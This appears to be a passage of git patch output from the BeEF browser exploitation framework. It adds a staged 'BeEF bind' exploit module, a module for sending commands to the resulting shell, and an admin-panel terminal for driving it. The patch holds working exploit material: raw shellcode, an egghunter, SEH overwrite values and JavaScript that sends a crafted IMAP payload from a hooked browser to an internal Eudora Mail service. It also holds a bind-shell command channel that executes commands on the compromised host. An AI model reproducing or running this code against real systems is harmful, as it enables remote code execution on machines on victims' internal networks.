+            "\x1b\x53\x68\x18\xb7\x3c\xb3\xff\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0\x74\x3d\x68\x00\x00" +
+            "\x00\x00\x8d\xbe\x14\x04\x00\x00\x57\x68\x86\x0b\x00\x00\x8d\xbe\x7a\x04\x00\x00\x57\x8d\x5c" +
+            "\x24\x70\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18\x04" +
+            "\x00\x00\x57\xff\x36\x68\xc2\xeb\x38\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52\xff\xd5\xe9\x38" +
+            "\xfe\xff\xff";
+
+    // Skape's NtDisplayString egghunter technique, 32 bytes -> see also string T00W inside
+    /*
+     * Egg Hunter (Skape's NtDisplayString technique).
+     * Original size: 32 bytes
+     *
+     * Next SEH and SEH pointers
+     * Size: 8 bytes
+     */
+    var egg_hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +
+                     "\xef\xb8\x42\x33\x33\x46\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
+    var next_seh   = "\xeb\x06\x90\x90";
+    var seh        = "\x4e\x3b\x01\x10";
+
+
+    gen_nops = function(count){
+        var i = 0;
+        var result = "";
+        while(i < count ){ result += "\x90";i++;}
+        log("gen_nops: generated " + result.length + " nops.");
+        return result;
+    };
+
+    /*
+     * send_stager_back():
+     * In order to properly calculate the exact size of the cross-domain request headers,
+     * we send a bogus request back to BeEF (different port, so still cross-domain).
+     *
+     * get_junk_size():
+     * Then we retrieve the total size of the HTTP headers, as well as other specific headers like 'Host'
+     *
+     * calc_junk_size():
+     * Calculate the differences with the request that will be sent to the target, for example:
+     * "Host: 172.16.67.1:2000\r\n"    //24 bytes
+     * "Host: 172.16.67.135:143\r\n"   //25 bytes
+     */
+    send_stager_back = function(){
+        var uri = "http://" + beef_host + ":" + beef_junk_port + "/";
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", uri, true);
+        xhr.setRequestHeader("Content-Type", "text/plain");
+        xhr.setRequestHeader('Accept','*/*');
+        xhr.setRequestHeader("Accept-Language", "en");
+        xhr.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
+        log("send_stager_back: sending back the stager to calculate headers size");
+    };
+
+    var timeout_counter = 0;
+    var timeout = 10;
+    var size,host,contenttype,referer,nops = null;
+    get_junk_size = function(){
+        var junk_name = "";
+        var uri = "http://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
+
+        $j.ajax({
+            type: "GET",
+            url: uri,
+            dataType: "json",
+            success: function(data, textStatus, xhr){
+                size = data.size;
+                host = data.host;
+                contenttype = data.contenttype;
+                referer = data.referer;
+
+                //todo to it better
+                nops = data.nops;
+
+                log("get_junk_size: OK - size [" + size + "] - host [" +
+                    host + "] - contenttype [" + contenttype + "] - referer [" + referer + "]");
+            },
+            error: function(jqXHR, textStatus, errorThrown){
+                timeout_counter++;
+                // re-tries for 10 times (10 seconds)
+                if (timeout_counter < timeout) {
+                    log("get_junk_size: ERROR - no data yet. re-trying.");
+                    setTimeout(function() {get_junk_size()},1000);
+                }else{
+                    log("get_junk_size: ERROR - timeout reached. giving up.");
+                }
+            }
+        });
+
+    };
+
+    var final_junk_size = null;
+    calc_junk_size = function(){
+
+        final_junk_size = size;
+        // 8 -> Host: \r\n
+        var new_host = (rhost+":"+service_port).length + 8;
+        if(new_host != host){
+
+            if(new_host > host){
+                var diff = new_host - host;
+                final_junk_size += diff;
+            }else{
+                var diff = host - new_host;
+                final_junk_size -= diff;
+            }
+        }
+        log("get_junk_size: final_junk_size -> [" + final_junk_size + "]");
+
+        //content-type "; charset=UTF-8" will not be present at the end, in the new request - we save 15 bytes
+        if(contenttype > 26)
+            final_junk_size -= 15;
+
+        // referrer should be the same
+        // we can also override the UserAgent (deliovering the Firefox Extension). We can then save 90 bytes or more.
+        log("get_junk_size: final_junk_size -> [" + final_junk_size + "]");
+    };
+
+    var stager_successfull = false;
+    send_stager = function(){
+
+        try{
+            xhr = new XMLHttpRequest();
+            var uri = "http://" + rhost + ":" + service_port + path;
+            log("send_stager: URI " + uri);
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+
+            //todo: if for some reasons the headers are too big (bigger than 425 bytes),
+            // a warning should be displayed, because the exploit will not work, given the
+            // space for the shellcode that we have.
+            // The likelihood of this can be minimized thanks to the Firefox Extension we deliver
+            // to disable PortBanning. We are also overriding the UserAgent, so we save up to 100 bytes of space.
+
+            var junk = available_space - stager.length - final_junk_size; // 22 bytes
+            var junk_data = gen_nops(junk);
+
+            var payload = junk_data + stager + next_seh + seh + egg_hunter;
+            var decoded_payload = Base64Binary.decode(btoa(payload));
+
+            var c = "";
+            for (var i = 0; i < decoded_payload.length; i++) {
+                c += String.fromCharCode(decoded_payload[i] & 0xff);
+            }
+
+            //needed to have the service replying before sending the actual exploit
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+            xhr.setRequestHeader('Accept','*/*');
+            xhr.setRequestHeader("Accept-Language", "en");
+            xhr.send("a001 LIST \r\n");
+            // / needed to have the service replying before sending the actual exploit
+
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+            xhr.setRequestHeader('Accept','*/*');
+            xhr.setRequestHeader("Accept-Language", "en");
+
+            var post_body = "a001 LIST " + "}" + c + "}" + "\r\n";
+
+            log("send_stager: Final body length [" + post_body.length + "]");
+
+            // this is required only with WebKit browsers.
+            if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+                console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+                    function byteValue(x) {
+                        return x.charCodeAt(0) & 0xff;
+                    }
+                    var ords = Array.prototype.map.call(datastr, byteValue);
+                    var ui8a = new Uint8Array(ords);
+                    this.send(ui8a.buffer);
+                }
+            }
+
+            xhr.sendAsBinary(post_body);
+            log("send_stager: stager sent.");
+            stager_successfull = true;
+        }catch(exception){
+            console.log("!!! Exception: " + exception);
+            // Check for PortBanning exceptions:
+            //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
+            if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
+                // not exactly needed but just in case
+                stager_successfull =  false;
+                log("Error: NS_ERROR_PORT_ACCESS_NOT_ALLOWED. Looks like PortBanning for port [" + service_port + "] is still enabled!");
+            }
+        }
+
+    };
+
+    deploy_stage = function () {
+        if(stager_successfull){
+            // As soon as the stage is running, the HTTP responses will contain Access-Control-Allow-Origin: *
+            // so we can communicate with CORS normally.
+            var decoded_shellcode = Base64Binary.decode(btoa(stage_allow_origin));
+            var c = "";
+            for (var i = 0; i < decoded_shellcode.length; i++) {
+                c += String.fromCharCode(decoded_shellcode[i] & 0xff);
+            }
+            var post_body = "cmd=" + c;
+            var uri = "http://" + rhost + ":" + rport + path;
+
+            xhr = new XMLHttpRequest();
+            console.log("uri: " + uri);
+            xhr.open("POST", uri, true);
+            xhr.setRequestHeader("Content-Type", "text/plain");
+
+            // this is required only with WebKit browsers.
+            if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+                console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+                    function byteValue(x) {
+                        return x.charCodeAt(0) & 0xff;
+                    }
+                    var ords = Array.prototype.map.call(datastr, byteValue);
+                    var ui8a = new Uint8Array(ords);
+                    this.send(ui8a.buffer);
+                }
+            }
+
+            xhr.sendAsBinary(post_body);
+            log("deploy_stage: stage sent.\r\n You should be now able to use beef_bind_shell module to send commands.");
+        }else{
+            log("Skipping Stage delivery because Stager failed.");
+        }
+
+    };
+
+    log = function(data){
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
+        console.log(data);
+    };
+
+
+/*
+* To calculate exact HTTP header size we send a request back to BeEF, on a different socket, to maintain
+* the cross-domain behavior.
+*/
+send_stager_back();
+
+/*
+* Deliver Stager and Stage.
+*
+* The following timeouts should be enough with normal DSL lines.
+* Increase delay value for slower clients.
+*/
+setTimeout("get_junk_size()", delay/2);
+setTimeout("calc_junk_size()", delay);
+setTimeout("send_stager()", 2000 + delay);
+setTimeout("deploy_stage()", 6000 + delay);
+
+});
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
new file mode 100755
index 000000000..991d89bf0
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        BeEF_bind_staged_deploy:
+            enable: true
+            category: ["Exploits", "BeEF_bind"]
+            name: "BeEF bind"
+            description: "Pwn internal services with a custom staging shellcode. Both the stager and the stage are delivered.<br />Right now only Eudora Mail 3 (v. v6.1.19.0) on Windows (POP ECX mailcmn.dll) can be exploited: SEH exploit with EggHunter. <br /> More exploits to come soon."
+            authors: ["antisnatchor", "tymiller"]  # shellcode awesomeness  -> Ty Miller
+            target:
+                working: ["FF"]
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
new file mode 100755
index 000000000..9ca8c3bde
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
@@ -0,0 +1,40 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Beef_bind_staged_deploy < BeEF::Core::Command
+
+	def self.options
+    configuration = BeEF::Core::Configuration.instance
+    beef_host = "#{configuration.get("beef.http.host")}"
+    beef_port = "#{configuration.get("beef.http.port")}"
+
+		return [
+      { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '172.16.67.135'},
+      { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143'},
+      { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
+      { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
+      { 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000'},
+      { 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host},
+      { 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port},
+      { 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000'},
+      { 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1'}
+    ]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From 79bf6f4a9f654979c168f37d896147b49368b956 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 16:07:31 +1100
Subject: [PATCH 072/397] Added BeEF_bind send_command module: this is used to
 communicate with the BeEF_bind shellcode (including in the IPEC admin_ui
 shell).

---
 .../beefbind/beef_bind_shell/command.js       | 95 +++++++++++++++++++
 .../beefbind/beef_bind_shell/config.yaml      | 25 +++++
 .../beefbind/beef_bind_shell/module.rb        | 31 ++++++
 3 files changed, 151 insertions(+)
 create mode 100755 modules/exploits/beefbind/beef_bind_shell/command.js
 create mode 100755 modules/exploits/beefbind/beef_bind_shell/config.yaml
 create mode 100755 modules/exploits/beefbind/beef_bind_shell/module.rb

diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js
new file mode 100755
index 000000000..288e42f09
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/command.js
@@ -0,0 +1,95 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function () {
+    var rhost = '<%= @rhost %>';
+    var rport = '<%= @rport %>';
+    var path = '<%= @path %>';
+    var cmd = '<%= @cmd %>';
+
+    var uri = "http://" + rhost + ":" + rport + path;
+
+    strip_output = function(output){
+
+        var offset = 0;
+        for(var c in output){
+            c = output.charAt(c);
+            if(c.charCodeAt(0) == 0){
+                break;
+            }
+            offset++;
+        }
+        return output.substring(0,offset);
+    };
+
+    var counter = 0;
+    get_additional_cmd_results = function(){
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            if(xhr.readyState == 4){
+                var result = strip_output(xhr.responseText);
+                console.log("result.length: " + result.length);
+                if(result.length != 0){
+                    console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
+                    beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
+                        counter++;
+                        setTimeout("get_additional_cmd_results()",500);
+                        }
+             }else{ // No more command results, ready to send another command.
+                console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
+            }
+        };
+        xhr.open("GET", uri, false);
+        xhr.send(null);
+    };
+
+    get_prompt = function () {
+
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            if(xhr.readyState == 4){
+                console.log("get_prompt: Retrieved prompt");
+                var prompt = strip_output(xhr.responseText);
+                console.log(prompt);
+                beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
+
+                //send command
+                send_command(cmd);
+            }
+        };
+        xhr.open("GET", uri, false);
+        xhr.send(null);
+    };
+
+    send_command = function(command){
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            var cmd_result = strip_output(xhr.responseText);
+            console.log(cmd_result);
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
+        };
+        xhr.open("POST", uri, false);
+        xhr.setRequestHeader("Content-Type", "text/plain");
+        command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+        xhr.send(command);
+        setTimeout("get_additional_cmd_results()",500);
+    };
+
+
+
+get_prompt();
+
+});
+
diff --git a/modules/exploits/beefbind/beef_bind_shell/config.yaml b/modules/exploits/beefbind/beef_bind_shell/config.yaml
new file mode 100755
index 000000000..9ce2708a9
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        BeEF_bind_shell:
+            enable: true
+            category: ["Exploits", "BeEF_bind"]
+            name: "BeEF bind shell"
+            description: "Send commands to be executed on the already deployed BeEF_bind shellcode, and get results back."
+            authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller
+            target:
+                working: ["FF","C","S"]
diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb
new file mode 100755
index 000000000..30e7d174a
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/module.rb
@@ -0,0 +1,31 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Beef_bind_shell < BeEF::Core::Command
+
+	def self.options
+		return [
+      { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '172.16.67.135'},
+      { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
+      { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
+      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From aa1efd1c73f6d26802e85555611165ea35ac1dd4 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 16:09:34 +1100
Subject: [PATCH 073/397] Added new IPEC admin_ui tab. This includes the new
 Wterm-based interactive shell to communicate with the BeEF_bind shellcode.

---
 .../admin_ui/controllers/panel/index.html     |   7 +-
 extensions/admin_ui/media/css/wterm.css       |  28 ++
 .../media/javascript/ui/panel/ZombieTab.js    |   8 +-
 .../javascript/ui/panel/tabs/ZombieTabIpec.js | 357 +++++++++++++++
 .../media/javascript/wterm/wterm.jquery.js    | 415 ++++++++++++++++++
 5 files changed, 811 insertions(+), 4 deletions(-)
 create mode 100644 extensions/admin_ui/media/css/wterm.css
 create mode 100644 extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
 create mode 100644 extensions/admin_ui/media/javascript/wterm/wterm.jquery.js

diff --git a/extensions/admin_ui/controllers/panel/index.html b/extensions/admin_ui/controllers/panel/index.html
index 31c92c23c..c49b0c3d5 100644
--- a/extensions/admin_ui/controllers/panel/index.html
+++ b/extensions/admin_ui/controllers/panel/index.html
@@ -28,7 +28,12 @@
 	<%= script_tag 'ui/panel/tabs/ZombieTabRider.js' %>
 	<%= script_tag 'ui/panel/tabs/ZombieTabXssRays.js' %>
 
-	<%= script_tag 'ui/panel/PanelViewer.js' %>
+    <%= script_tag 'wterm/wterm.jquery.js' %>
+    <%= stylesheet_tag 'wterm.css' %>
+    <script type="text/javascript" language="JavaScript">var $jwterm = jQuery.noConflict();</script>
+    <%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %>
+
+    <%= script_tag 'ui/panel/PanelViewer.js' %>
 	<%= script_tag 'ui/panel/DataGrid.js' %>
 	<%= script_tag 'ui/panel/MainPanel.js' %>
 	<%= script_tag 'ui/panel/ZombieTab.js' %>
diff --git a/extensions/admin_ui/media/css/wterm.css b/extensions/admin_ui/media/css/wterm.css
new file mode 100644
index 000000000..064e8cd41
--- /dev/null
+++ b/extensions/admin_ui/media/css/wterm.css
@@ -0,0 +1,28 @@
+/*
+ *   Copyright 2012 Wade Alcorn wade@bindshell.net
+ *
+ *   Licensed under the Apache License, Version 2.0 (the "License");
+ *   you may not use this file except in compliance with the License.
+ *   You may obtain a copy of the License at
+ *
+ *       http://www.apache.org/licenses/LICENSE-2.0
+ *
+ *   Unless required by applicable law or agreed to in writing, software
+ *   distributed under the License is distributed on an "AS IS" BASIS,
+ *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ *   See the License for the specific language governing permissions and
+ *   limitations under the License.
+ */
+/* Basic Terminal CSS */
+.wterm_terminal {  background: #000; color: #fff; font-size: 1em; font-family: monospace; padding: 3px; width: 100%; height: 100%; display: block; overflow-x: none; overflow-y: auto;  }
+
+/* TODO: Input Box Width is faulty */
+.wterm_terminal input { background: transparent; border: 0; color: #fff; width: 100%; font-size: 1em; font-family: monospace; outline: none;   }
+.wterm_terminal div:first { margin-bottom: 1em; }
+.wterm_terminal .wterm_prompt { float: left; clear: left;  }
+.wterm_terminal  form { float: left; margin: 0px; width: 75%; }
+
+/* Themes */
+.wterm_theme_green_on_black { background: #000; color: #0f0; }
+.wterm_theme_green_on_black input { background: transparent; border: 0; color: #0f0; }
+
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
index cea031726..3e8466e55 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
@@ -20,8 +20,10 @@ ZombieTab = function(zombie) {
 	commands_tab = new ZombieTab_Commands(zombie);
 	requester_tab = new ZombieTab_Requester(zombie);
     xssrays_tab =  new ZombieTab_XssRaysTab(zombie);
-	
-	ZombieTab.superclass.constructor.call(this, {
+    ipec_tab = new ZombieTab_IpecTab(zombie);
+
+
+    ZombieTab.superclass.constructor.call(this, {
         id:"current-browser",
 		activeTab: 0,
 		loadMask: {msg:'Loading browser...'},
@@ -32,7 +34,7 @@ ZombieTab = function(zombie) {
 			forceFit: true,
 			type: 'fit'
 		},
-		items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab]
+		items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab]
 	});
 };
 
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
new file mode 100644
index 000000000..ca4dbb325
--- /dev/null
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
@@ -0,0 +1,357 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+/*
+ * The Ipec Tab panel for the selected zombie.
+ */
+
+ZombieTab_IpecTab = function(zombie) {
+
+	var commands_statusbar = new Beef_StatusBar('ipec-bbar-zombie-'+zombie.session);
+
+     var req_pagesize = 30;
+
+    var ipec_config_panel = new Ext.Panel({
+		id: 'ipec-config-zombie-'+zombie.session,
+		title: 'Scan Config',
+		layout: 'fit',
+        autoscroll: true
+	});
+
+    function get_rest_token(){
+        var token = "";
+        var url = "/ui/modules/getRestfulApiToken.json";
+        $jwterm.ajax({
+            contentType: 'application/json',
+            dataType: 'json',
+            type: 'GET',
+            url: url,
+            async: false,
+            processData: false,
+            success: function(data){
+                token = data.token;
+                console.log(token);
+            },
+            error: function(){
+                console.log("Error getting RESTful API token");
+            }
+        });
+        return token;
+    }
+
+    function get_module_id(name, token){
+        var id = "";
+        var url = "/api/modules/search/" + name + "?token=" + token;
+        $jwterm.ajax({
+            contentType: 'application/json',
+            dataType: 'json',
+            type: 'GET',
+            url: url,
+            async: false,
+            processData: false,
+            success: function(data){
+                id = data.id;
+            },
+            error: function(){
+                console.log("Error getting module id.");
+            }
+        });
+        return id;
+    }
+
+
+    function escape_html(str) {
+        str = str.toString();
+        str = str.replace(/</g, '&lt;');
+        str = str.replace(/>/g, '&gt;');
+//        str = str.replace(/\u0022/g, '&quot;');
+        str = str.replace(/\u0027/g, '&#39;');
+        str = str.replace(/\"\"/g, '');
+        str = str.replace(/\\r/g, '');
+        str = str.replace(/\\n/g, '<br>');
+        str = str.replace(/\\\\/g, '\\');
+        str = str.replace(/\\t/g, '&nbsp;&nbsp;&nbsp;&nbsp;');
+//        str = str.replace(/\\/g, '&#92;');
+        return str;
+    }
+
+
+    function initTerminal(zombie){
+        String.prototype.reverse = function() {
+            return this.split('').reverse().join('');
+        };
+
+        $jwterm( document ).ready( function() {
+            $jwterm('#wterm').wterm( { WIDTH: '100%', HEIGHT: '100%', WELCOME_MESSAGE: 'Welcome to BeEF Bind interactive shell. To Begin Using type \'help\'' });
+        });
+
+        var target_ip = "";
+        var target_port = "";
+
+        var command_directory = {
+            'eval': function( tokens ) {
+                tokens.shift();
+                var expression = tokens.join( ' ' );
+                var result = '';
+                try {
+                    result = eval( expression );
+                } catch( e ) {
+                    result = 'Error: ' + e.message;
+                }
+                return result;
+            },
+
+            'date': function( tokens ) {
+                var now = new Date();
+                return now.getDate() + '-' +
+                    now.getMonth() + '-' +
+                    ( 1900 + now.getYear() )
+            },
+
+            'cap': function( tokens ) {
+                tokens.shift();
+                return tokens.join( ' ' ).toUpperCase();
+            },
+
+            'go': function( tokens ) {
+                var url = tokens[1];
+                document.location.href = url;
+            },
+
+            'target': function(tokens){
+                target_ip = tokens[1];
+                target_port = tokens[2];
+                return "Target is now " + tokens[1] + ":" + tokens[2];
+            },
+
+
+            'exec': function(tokens){
+                if(target_ip.length == 0 || target_port.length == 0)
+                   return "Error: target ip or port not set."
+
+                tokens.shift(); //remove the first element (exec)
+                var cmd = tokens.join(' '); //needed in case of commands with options
+                cmd = cmd.replace(/\\/g, '\\\\'); //needed to prevent JS errors (\ need to be escaped)
+
+                var token = get_rest_token();
+                var mod_id = get_module_id("BeEF_bind_shell", token);
+
+                var uri = "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token;
+
+                var result = null;
+
+                $jwterm.ajax({
+                    contentType: 'application/json',
+                    data: JSON.stringify({"rhost":target_ip, "rport":target_port, "path":"/", "cmd":cmd}),
+                    dataType: 'json',
+                    type: 'POST',
+                    url: uri,
+                    async: false,
+                    processData: false,
+                    success: function(data){
+                        console.log("data: " + data.command_id);
+                        result = "Command [" + data.command_id + "] sent successfully";
+                    },
+                    error: function(){
+                        console.log("Error sending command");
+                        return "Error sending command";
+                    }
+                });
+
+                return result;
+            },
+
+            'get': function(tokens){
+                var command_id = tokens[1];
+
+                if(command_id != null){
+
+                    var token = get_rest_token();
+                    var mod_id = get_module_id("BeEF_bind_shell", token);
+
+                    var uri_results = "/api/modules/" + zombie.session + "/" + mod_id + "/"
+                        + command_id + "?token=" + token;
+                    var results = "";
+                    $jwterm.ajax({
+                        contentType: 'application/json',
+                        dataType: 'json',
+                        type: 'GET',
+                        url: uri_results,
+                        async: false,
+                        processData: false,
+                        success: function(data){
+                            $jwterm.each(data, function(i){
+                                console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
+                                results += $jwterm.parseJSON(data[i].data).data;
+                            });
+
+                        },
+                        error: function(){
+                            console.log("Error sending command");
+                            return "Error sending command";
+                        }
+                    });
+                    results = escape_html(results);
+                    if(results.charAt(0) == '"' && results.charAt(results.length-1) == '"')
+                         results = results.slice(1,results.length-1);
+
+                    return results;
+                }
+            },
+
+            'strrev': {
+                PS1: 'strrev $',
+
+                EXIT_HOOK: function() {
+                    return 'exit interface commands';
+                },
+
+                START_HOOK: function() {
+                    return 'exit interface commands';
+                },
+
+                DISPATCH: function( tokens ) {
+                    return tokens.join('').reverse();
+                }
+            }
+        };
+
+        for( var j in command_directory ) {
+            $jwterm.register_command( j, command_directory[j] );
+        }
+
+        $jwterm.register_command( 'help', function() {
+            return 'target - Usage: target &lt;IP&gt; &lt;port&gt; - Send commands to the specified IP:port<br>' +
+                   'exec - Usage exec &lt;command&gt; &lt;command options&gt;  - Exec a command, returns the command id.<br>' +
+                   'get - Usage get &lt;command id&gt; - Retrieve command results given a specified command id.<br>'
+
+        });
+    };
+
+
+    var ipec_terminal_panel = new Ext.Panel({
+        id: 'ipec-terminal-zombie-'+zombie.session,
+        title: 'Terminal',
+        layout: 'fit',
+        padding: '1 1 1 1',
+        autoScroll: true,
+        html: "<style>body { background: #000; font-size: 1em;}</style><div id='wterm'></div>",
+        listeners: {
+            afterrender : function(){
+                initTerminal(zombie);
+            }
+        }
+
+    });
+
+     var ipec_logs_store = new Ext.ux.data.PagingJsonStore({
+        storeId: 'ipec-logs-store-zombie-' + zombie.session,
+        url: '/ui/ipec/zombie.json',
+        remoteSort: false,
+        autoDestroy: true,
+        autoLoad: false,
+        root: 'logs',
+
+        fields: ['id', 'vector_method', 'vector_name', 'vector_poc'],
+        sortInfo: {field: 'id', direction: 'DESC'},
+
+        baseParams: {
+            nonce: Ext.get("nonce").dom.value,
+            zombie_session: zombie.session
+        }
+    });
+
+    var ipec_logs_bbar = new Ext.PagingToolbar({
+        pageSize: req_pagesize,
+        store: ipec_logs_store,
+        displayInfo: true,
+        displayMsg: 'Displaying history {0} - {1} of {2}',
+        emptyMsg: 'No history to display'
+    });
+
+    var ipec_logs_grid = new Ext.grid.GridPanel({
+        id: 'ipec-logs-grid-zombie-' + zombie.session,
